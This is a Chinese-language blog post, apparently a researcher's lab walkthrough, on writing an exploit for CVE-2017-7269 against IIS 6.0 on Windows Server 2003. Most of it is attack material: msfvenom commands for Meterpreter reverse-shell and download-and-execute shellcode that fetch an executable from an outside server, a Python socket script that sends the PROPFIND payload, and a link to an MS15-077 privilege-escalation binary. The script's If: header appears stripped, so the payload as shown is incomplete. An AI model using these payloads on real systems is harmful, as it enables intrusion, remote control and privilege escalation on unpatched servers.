编写CVE-2017-7269(IIS 6.0) EXP 发表于 2017-03-29 | 分类于 漏洞利用 | 暂无评论 直切主题,测试环境是`Windows Server 2003 R2 Enterprise Edition SP2 x86` ![image_1bccub7e11kjg12de1cfeao5ig29.png-43.2kB][1] 先调试一下[POC][2] ![image_1bccunicd1uln1n0k1n7l1qua1dkom.png-159.1kB][3] [1]: http://static.zybuluo.com/birdg0/ddbt7i9kmhwgbouwril1g9l3/image_1bccub7e11kjg12de1cfeao5ig29.png [2]: https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py [3]: http://static.zybuluo.com/birdg0/1fr4b4mm8batuk12r4ulnyy0/image_1bccunicd1uln1n0k1n7l1qua1dkom.png [4]: http://static.zybuluo.com/birdg0/w7il54i1b6axxnc7uj7o57d8/image_1bcd0qt101j0vhp57vikkq1g3s13.png [5]: http://static.zybuluo.com/birdg0/jp212q6i170xefb1ypt2wbzv/image_1bcd2930s1ejn1nse16pe18et1hjr2n.png [6]: http://static.zybuluo.com/birdg0/qcmzzwsvrq5tvywi9hvjp9mi/2017-03-30_095853.png [7]: https://github.com/birdg0/exp/blob/master/local/windows/ms15-077.exe 断到执行shellcode的开始,可以发现那段shellcode都转换成了`unicode`编码,并且`ESI`指向shellcode的起始地址,因此到这一步知道了可以用`msfvenom`中的`x86/unicode_upper`编码器并把`BufferRegister`设为`ESI`来生成shellcode,然后生成个shellcode测试一下 ``` msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.194.139 LPORT=4444 -e x86/unicode_upper BufferRegister=ESI -f python ``` 但是在执行shellcode时遇到了Crash ![image_1bcd0qt101j0vhp57vikkq1g3s13.png-144.8kB][4] 因为`ebp`指向的地址是不可访问的,因此为了提高生成shellcode的成功率把`\x55`作为坏字节,并用`x86/unicode_mixed`来编码,这样就可以生成比较稳定的shellcode。之后又遇到一个坑就是在反弹shell时一连上就断,问了下这里搞渗透的师傅,可以先`download`一个`exe`的shellcode然后再执行,于是先生成一个`exe`的shellcode,并把它放到一个服务器上 ``` msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.194.139 LPORT=4444 -e x86/unicode_mixed BufferRegister=ESI -b '\x55' -f exe > reverse.exe ``` 然后生成`download_exec`的shellcode,这里要特别注意**保存的路径必须为可写**,又问了下搞渗透的师傅,任意用户都有`C://RECYCLER`目录的写权限 ``` msfvenom -a x86 -platform windows -p windows/download_exec EXE="C://RECYCLER//reverse.exe" URL="http://10.26.71.36/reverse.exe" -e x86/unicode_mixed BufferRegister=ESI -b '\x55' -f python ``` 生成后替换原来的shellcode ``` import socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(('192.168.194.135',80)) pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n' pay+='If: ' pay+=' (Not ) \r\n\r\n' print pay sock.send(pay) data = sock.recv(80960) print data sock.close ``` 最后发送payload就得到了一个稳定的反弹shell ![image_1bcd2930s1ejn1nse16pe18et1hjr2n.png-817.5kB][5] 进一步进行提权,这里使用`MS15-077`的EXP ![2017-03-30_095853.png-1290.2kB][6] 提权EXP:[https://github.com/birdg0/exp/blob/master/local/windows/ms15-077.exe][7]